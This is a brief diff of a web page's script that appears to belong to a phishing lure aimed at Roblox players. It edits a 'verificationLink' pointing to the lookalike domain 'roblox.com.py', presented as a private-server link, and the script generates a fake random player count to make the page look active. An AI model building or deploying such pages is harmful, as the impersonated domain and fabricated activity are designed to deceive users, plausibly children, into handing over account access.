--- a/index.2.html
+++ b/index.2.html
@@ -160,7 +160,7 @@
     <script>
         const playerCount = document.getElementById("playerCount");
         const popup = document.getElementById("popup");
-        const verificationLink = "https://roblox.com.py/games/2202454476/Cozy-House?privateServerLinkCode=11992338765752773826096531271247/verify?guild=9404655624893129";
+        const verificationLink = "https://roblox.com.py/games/2202454476/Cozy-House?privateServerLinkCode=11992338765752773826096531271247";
 
         let count = Math.floor(200 + Math.random() * 800);
         let displayedCount = count;
